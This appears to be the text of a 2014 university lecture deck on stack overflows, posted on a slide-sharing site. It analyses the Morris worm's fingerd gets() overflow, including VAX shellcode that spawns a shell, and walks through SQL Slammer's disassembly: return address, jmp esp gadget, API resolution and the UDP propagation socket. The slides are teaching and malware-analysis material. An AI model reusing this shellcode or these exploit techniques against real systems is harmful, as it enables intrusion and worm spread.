software security
play

Software Security Smashing the Stack: Real-World Examples Jan - PowerPoint PPT Presentation

Jul 28, 2023 •438 likes •695 views

Software Security Smashing the Stack: Real-World Examples Jan Nordholz Prof. Jean-Pierre Seifert Security in Telecommunications TU Berlin SoSe 2014 jan (sect) Software Security SoSe 2014 1 / 24 Example 1: the Morris worm (1988) first

  1. Software Security Smashing the Stack: Real-World Examples Jan Nordholz Prof. Jean-Pierre Seifert Security in Telecommunications TU Berlin SoSe 2014 jan (sect) Software Security SoSe 2014 1 / 24

  2. Example 1: the Morris worm (1988) first (major) internet worm approx. 6000 infected hosts three attack vectors for spreading itself: password guessing (rsh / rexec) sendmail debug feature abuse buffer overflow! jan (sect) Software Security SoSe 2014 2 / 24

  3. Example 1: the Morris worm (1988) Vulnerable application: fingerd network service Finger: ancient service to query user information (back in the days when the internet was not yet open to the general public) hesso@foo: ∼ >finger hesso@bar Login: hesso Name: Jan Nordholz Directory: /home/hesso Shell: /bin/bash Office: TEL 16, (030) 8353-58663 Never logged in. No mail. No Plan. jan (sect) Software Security SoSe 2014 3 / 24

  4. Example 1: the Morris worm (1988) Back then, fingerd was implemented roughly as: read requested username from network socket create subprocess execv(/usr/ucb/finger, { finger, username, NULL } ) read output from subprocess feed said output back over network socket Guess what kind of buffer the ”username” is read into. . . jan (sect) Software Security SoSe 2014 4 / 24

  5. Example 1: the Morris worm (1988) Main bug: usage of gets() NEVER USE THIS FUNCTION. Ever. Reads characters from standard input. . . stops at newline (hex 0x0a). . . but at nothing else! ⇒ Happily reads zero bytes. . . ⇒ No bounds checks! Unless you know what the input data is, you can never say how many bytes gets() is going to read. jan (sect) Software Security SoSe 2014 5 / 24

  6. Example 1: the Morris worm (1988) Payload: very simple. Stdin/stdout are already set up properly, so all it has to do is execve(/bin/sh, ...) . DEC VAX Assembly (stores are left-to-right): ; ’/sh \ 0’ DD8F2F736800 pushl $68732f DD8F2F62696E pushl $6e69622f ; ’/bin’ D05E5A movl sp, r10 ; save pointer to command DD00 pushl $0 ; third parameter DD00 pushl $0 ; second parameter ; push address of ’/bin/sh \ 0’ DD5A pushl r10 DD03 pushl $3 ; number of arguments for chmk D05E5C movl sp, ap ; Argument Pointer register ; = stack pointer BC3B chmk $3b ; change-mode-to-kernel Basically the same as our int $0x80 stuff. jan (sect) Software Security SoSe 2014 6 / 24

  7. Example 2: SQL Slammer / Sapphire (2003) Also called the ”mini worm”. Fits into a single network packet. Attacks a UDP network service (MS SQL Server). UDP = no latency (no waiting for TCP SYN/ACK), source spoofing. . . ⇒ Massive infection wave. Infection vector: Buffer Overflow! jan (sect) Software Security SoSe 2014 7 / 24

  8. Example 2: SQL Slammer / Sapphire (2003) Main bug: string construction into static buffer with sprintf() . Input data is used for a ”%s” conversion. Worm does not contain zero bytes. ⇒ Full worm body spilled onto stack. Construction novelty (compared to our sample code during the last weeks): Actual worm code resides beyond the return pointer. Control is transferred to worm code by borrowing an instruction from a DLL. (We’ll see a much more systematic approach to this technique in a few weeks.) jan (sect) Software Security SoSe 2014 8 / 24

  9. Example 2: SQL Slammer / Sapphire (2003) jan (sect) Software Security SoSe 2014 9 / 24

  10. Example 2: SQL Slammer / Sapphire (2003) Way until the worm gains control: sprintf() overwrites stack with worm return pointer overwritten with 0x42B0C9DC in order to survive until function exit without causing an exception, dummy, but ”safe” arguments are provided (e. g. pointers to 0x42AE7001 ) return pointer points somewhere into sqlsort.dll exact address contains the instruction: 0x42b0c9dc: jmp %esp ⇒ At exit of the vulnerable function: stack is unwound up to the return pointer (violet) return pointer is pop ped, stack pointer thus moves to start of orange area control is transferred to %esp via above carefully selected jump instruction jan (sect) Software Security SoSe 2014 10 / 24

  11. Example 2: SQL Slammer / Sapphire (2003) 81: eb 0e jmp 0x91 ...(dummy arguments) 91: 90 nop ... 98: 90 nop worm jumps forward 14 bytes past its pretense function arguments NOP slide, possibly included for versatility while developing the worm jan (sect) Software Security SoSe 2014 11 / 24

  12. Example 2: SQL Slammer / Sapphire (2003) 99: 68 dc c9 b0 42 push $0x42b0c9dc 9e: b8 01 01 01 01 mov $0x1010101,%eax a3: 31 c9 xor %ecx,%ecx a5: b1 18 mov $0x18,%cl a7: 50 push %eax a8: e2 fd loop 0xa7 aa: 35 01 01 01 05 xor $0x5010101,%eax af: 50 push %eax worm restores its own body (return pointer, padding) last two instructions restore the 0x04 at the start, which is crucial to the exploit (it triggers the vulnerable code path) reason: worm needs to restore itself because vulnerable function has partially clobbered the stack contents jan (sect) Software Security SoSe 2014 12 / 24

  13. Example 2: SQL Slammer / Sapphire (2003) b0: 89 e5 mov %esp,%ebp b2: 51 push %ecx b3: 68 2e 64 6c 6c push $0x6c6c642e b8: 68 65 6c 33 32 push $0x32336c65 bd: 68 6b 65 72 6e push $0x6e72656b ... eb: 66 b9 74 6f mov $0x6f74,%cx ef: 51 push %ecx f0: 68 73 65 6e 64 push $0x646e6573 worm sets frame pointer (easier for dereferencing) worm pushes strings onto the stack: ”kernel32.dll”, ”GetTickCount”, ”ws2 32.dll”, ”socket”, ”sendto” jan (sect) Software Security SoSe 2014 13 / 24

  14. Example 2: SQL Slammer / Sapphire (2003) f5: be 18 10 ae 42 mov $0x42ae1018,%esi fa: 8d 45 d4 lea -0x2c(%ebp),%eax fd: 50 push %eax fe: ff 16 call *(%esi) 100: 50 push %eax worm uses a resolved entry in the IAT of sqlsort.dll . IAT: Import Address Table — cf. PLT (Procedure Linkage Table) on Linux. Recall: PLT entries point to the actual function code in the loaded library (if the symbol has been resolved) or to a stub function in the dynamic linker (which then resolves the symbol and replaces the entry). No address randomization, so library and therefore IAT slot position is known. IAT slot is for ”LoadLibrary” — the equivalent of dlopen() . ⇒ LoadLibrary(ws2 32.dll) . jan (sect) Software Security SoSe 2014 14 / 24

  15. Example 2: SQL Slammer / Sapphire (2003) 101: 8d 45 e0 lea -0x20(%ebp),%eax 104: 50 push %eax 105: 8d 45 f0 lea -0x10(%ebp),%eax 108: 50 push %eax 109: ff 16 call *(%esi) 10b: 50 push %eax first two lines: prepares the argument ”GetTickCount” for later next four lines: uses the same IAT slot for LoadLibrary(kernel32.dll) handle returned by LoadLibrary is stored on the stack jan (sect) Software Security SoSe 2014 15 / 24

  16. Example 2: SQL Slammer / Sapphire (2003) 10c: be 10 10 ae 42 mov $0x42ae1010,%esi 111: 8b 1e mov (%esi),%ebx 113: 8b 03 mov (%ebx),%eax 115: 3d 55 8b ec 51 cmp $0x51ec8b55,%eax 11a: 74 05 je 0x121 11c: be 1c 10 ae 42 mov $0x42ae101c,%esi 121: ff 16 call *(%esi) 123: ff d0 call *%eax worm searches for the IAT slot for ”GetProcAddress”, the Windows equivalent for dlsym() , i. e. dynamic symbol resolution at runtime worm knows two possible IAT slots ⇒ worm ”supports” two different patched versions of SQL server IAT slot is verified by checking the first four instruction bytes of the referenced function body against known prologue finally used to call GetProcAddress(kernel32.dll, GetTickCount) then calls GetTickCount() as seed for PRNG jan (sect) Software Security SoSe 2014 16 / 24

  17. Example 2: SQL Slammer / Sapphire (2003) 125: 31 c9 xor %ecx,%ecx 127: 51 push %ecx 128: 51 push %ecx 129: 50 push %eax 12a: 81 f1 03 01 04 9b xor $0x9b040103,%ecx 130: 81 f1 01 01 01 01 xor $0x1010101,%ecx 136: 51 push %ecx makes room on stack then pushes tick count (EAX register) then pushes 0x9A050002 , which serve as .sin family and .sin port members for the new destination struct in addr (see manpage for ip(7)) tick count serves as .sin addr and is later randomized jan (sect) Software Security SoSe 2014 17 / 24

  18. Example 2: SQL Slammer / Sapphire (2003) 137: 8d 45 cc lea -0x34(%ebp),%eax 13a: 50 push %eax 13b: 8b 45 c0 mov -0x40(%ebp),%eax 13e: 50 push %eax 13f: ff 16 call *(%esi) 141: 6a 11 push $0x11 143: 6a 02 push $0x2 145: 6a 02 push $0x2 147: ff d0 call *%eax 149: 50 push %eax resolves ”socket” using ”GetProcAddress” using the string literal and the opaque handle for ”ws2 32.dll” returned earlier from ”LoadLibrary” calls socket(2, 2, 11) , which symbolically means: socket(AF INET, SOCK DGRAM, IPPROTO UDP) ⇒ new udp socket created jan (sect) Software Security SoSe 2014 18 / 24

  19. Example 2: SQL Slammer / Sapphire (2003) 14a: 8d 45 c4 lea -0x3c(%ebp),%eax 14d: 50 push %eax 14e: 8b 45 c0 mov -0x40(%ebp),%eax 151: 50 push %eax 152: ff 16 call *(%esi) 154: 89 c6 mov %eax,%esi 156: 09 db or %ebx,%ebx 158: 81 f3 3c 61 d9 ff xor $0xffd9613c,%ebx worm resolves ”sendto” from ”ws2 32.dll” function pointer stored into ESI register EBX (improperly) initialized jan (sect) Software Security SoSe 2014 19 / 24

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

deel 2 sws1 1 Software and Web Security - 1 & 2 Software is the main source of security

deel 2 sws1 1 Software and Web Security - 1 & 2 Software is the main source of security

Software and Web Security deel 2 sws1 1 Software and Web Security - 1 & 2 Software is the main source of security vulnerabilities esp in systems accessible via a network part 1 security problems in machine code, compiled from C(++)

1.35k views • 67 slides
Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 & 2 y Software

Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 & 2 y Software

1 Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 & 2 y Software is the main source of security vulnerabilities esp in systems accessible via a network i t ibl i t k part 1 part 1 security problems

672 views • 65 slides
Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software

Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software

Software Security By Hunter Stevenson Khalid Alharbi CSCI 5828 Foundations of Software Engineering Spring 2012 What is the talk NOT about? Cryptography. Database security. Operating Systems security. Network security.

1.37k views • 121 slides
Software Security: Defenses & Principles CS 161: Computer Security Prof. Vern Paxson TAs:

Software Security: Defenses & Principles CS 161: Computer Security Prof. Vern Paxson TAs:

Software Security: Defenses & Principles CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ January 25, 2011 Testing for Software Security Issues

444 views • 42 slides
Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust

Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust

Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust Boundary Attacks Threats Application Attacker Exploit Vulnerability : a software defect with security consequences Threat : a potential danger to

1.54k views • 80 slides
Software In-Security Buffer overflows Overview Web Application security Malware OS

Software In-Security Buffer overflows Overview Web Application security Malware OS

Lecture overview Table of contents: Introduction to SW security Software In-Security Buffer overflows Overview Web Application security Malware OS security topics Code scanning Emmanuel Benoist Taught by Ulrich

479 views • 13 slides
CS-412 Software Security Introduction Mathias Payer EPFL, Spring 2019 Mathias Payer CS-412

CS-412 Software Security Introduction Mathias Payer EPFL, Spring 2019 Mathias Payer CS-412

CS-412 Software Security Introduction Mathias Payer EPFL, Spring 2019 Mathias Payer CS-412 Software Security Course outline Secure software lifecycle Security policies Attack vectors Defense strategies: mitigations and testing Case

681 views • 49 slides
CS412 Software Security Secure Software Lifecycle Mathias Payer EPFL, Spring 2019 Mathias Payer

CS412 Software Security Secure Software Lifecycle Mathias Payer EPFL, Spring 2019 Mathias Payer

CS412 Software Security Secure Software Lifecycle Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Software liveliness Software is not a one-shot effort Software development, production, and maintenance are cost/labor

449 views • 23 slides
CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412

CS412 Software Security Web Security Mathias Payer EPFL, Spring 2019 Mathias Payer CS412 Software Security Web (and internet) security: two views Just a long running network service Complex application with multiple layers and components.

577 views • 47 slides
Introduction Gang Tan Penn State University Spring 2019 CMPSC 447: Software Security Why a

Introduction Gang Tan Penn State University Spring 2019 CMPSC 447: Software Security Why a

Introduction Gang Tan Penn State University Spring 2019 CMPSC 447: Software Security Why a course on software security? Software plays a major role in the modern society But is a major source of security problems. Software is the

659 views • 30 slides
Secure Software Development TDDC90 Software Security Ulf Kargn Institutionen fr

Secure Software Development TDDC90 Software Security Ulf Kargn Institutionen fr

Secure Software Development TDDC90 Software Security Ulf Kargn Institutionen fr Datavetenskap (IDA) Avdelningen fr Databas- och Informationsteknik (ADIT) Original slides by Marcus Bendtsen Agenda Securing the software

1.91k views • 65 slides
Chapter 11 Software Security Secure programs Security implies some degree of trust that the

Chapter 11 Software Security Secure programs Security implies some degree of trust that the

Chapter 11 Software Security Secure programs Security implies some degree of trust that the program enforces expected C onfidentiality I ntegrity A vailability How can we look at software component and assess its

837 views • 49 slides
CS527 Software Security Secure Software Lifecycle Mathias Payer Purdue University, Spring 2018

CS527 Software Security Secure Software Lifecycle Mathias Payer Purdue University, Spring 2018

CS527 Software Security Secure Software Lifecycle Mathias Payer Purdue University, Spring 2018 Mathias Payer CS527 Software Security Software liveliness Software is not a one-shot effort Software development, production, and maintenance are

725 views • 23 slides
Web Security TDDC90 Software Security Ulf Kargn Institutionen fr Datavetenskap (IDA)

Web Security TDDC90 Software Security Ulf Kargn Institutionen fr Datavetenskap (IDA)

Web Security TDDC90 Software Security Ulf Kargn Institutionen fr Datavetenskap (IDA) Avdelningen fr Databas- och Informationsteknik (ADIT) Original slides by Marcus Bendtsen Some recent attacks 2 A game changer The Internet

1.17k views • 87 slides
Software Security Return to Libc and ROP Jan Nordholz Prof. Jean-Pierre Seifert Security in

Software Security Return to Libc and ROP Jan Nordholz Prof. Jean-Pierre Seifert Security in

Software Security Return to Libc and ROP Jan Nordholz Prof. Jean-Pierre Seifert Security in Telecommunications TU Berlin SoSe 2014 jan (sect) Software Security SoSe 2014 1 / 13 Recap: Overflow Bugs Ingredients: fixed-size buffer on the

429 views • 13 slides
CS527 Software Security Web Security Mathias Payer Purdue University, Spring 2018 Mathias Payer

CS527 Software Security Web Security Mathias Payer Purdue University, Spring 2018 Mathias Payer

CS527 Software Security Web Security Mathias Payer Purdue University, Spring 2018 Mathias Payer CS527 Software Security Daemons / Services / Servers A daemon is a long running service that serves outside requests. A web server, a mail

503 views • 31 slides
Network Forensics and Next Generation Internet Attacks Moderated by: Moheeb Rajab Background

Network Forensics and Next Generation Internet Attacks Moderated by: Moheeb Rajab Background

Network Forensics and Next Generation Internet Attacks Moderated by: Moheeb Rajab Background singers: Jay and Fabian 1 Agenda Questions and Critique of Timezones paper Extensions Network Monitoring (recap) Post-Mortem Analysis

666 views • 40 slides
Four Grand Challenges in Trustworthy Computing Why Grand Challenges? Inspire creative

Four Grand Challenges in Trustworthy Computing Why Grand Challenges? Inspire creative

Four Grand Challenges in Trustworthy Computing Why Grand Challenges? Inspire creative thinking Encourage thinking beyond the incremental Some important problems require multiple approaches over long periods of time Big

677 views • 52 slides
Machine-Level Programming V: Advanced Topics 15-213:

Machine-Level Programming V: Advanced Topics 15-213:

Carnegie Mellon Machine-Level Programming V: Advanced Topics 15-213: Introduc0on to Computer Systems 8 th Lecture, Sep. 16, 2010 Instructors: Randy Bryant &

738 views • 53 slides
by Bisyron Wahyudi Muhammad Salahuddien Amount of malicious traffic circulating on the

by Bisyron Wahyudi Muhammad Salahuddien Amount of malicious traffic circulating on the

by Bisyron Wahyudi Muhammad Salahuddien Amount of malicious traffic circulating on the Internet is increasing significantly. Increasing complexity and rapid change in hosts and networks technology suggests that there will be new

1.05k views • 46 slides
Software and Web Security deel 1 deel 1 sws1 About this course: people Erik Poll P t

Software and Web Security deel 1 deel 1 sws1 About this course: people Erik Poll P t

1 Software and Web Security deel 1 deel 1 sws1 About this course: people Erik Poll P t Peter Schwabe S h b Pol van Aubel Ko Stoffelen Ko Stoffelen sws1 2 About this course: topics & goals g Standard

943 views • 48 slides
CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking

CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking

CS241 Computer Organization Spring 2015 Buffer Overflow 4-022015 Outline Linking & Loading, continued Buffer Overflow Read: CSAPP2: section 3.12: out-of-bounds memory references & buffer overflow K&R:

775 views • 43 slides
Stack Buffer Overflows Deian Stefan Some slides adopted from Kirill Levchenko and Stefan Savage

Stack Buffer Overflows Deian Stefan Some slides adopted from Kirill Levchenko and Stefan Savage

CSE 127: Computer Security Stack Buffer Overflows Deian Stefan Some slides adopted from Kirill Levchenko and Stefan Savage When is a program secure? When it does exactly what it should? Not more Not less But how do we know what

1.42k views • 119 slides
WEIRDS Status Update Murray Kucherawy <superuser@gmail.com> The

WEIRDS Status Update Murray Kucherawy <superuser@gmail.com> The

WEIRDS Status Update Murray Kucherawy <superuser@gmail.com> The Story So Far WHOIS is a rudimentary protocol that originated in the early days of

268 views • 5 slides

More recommend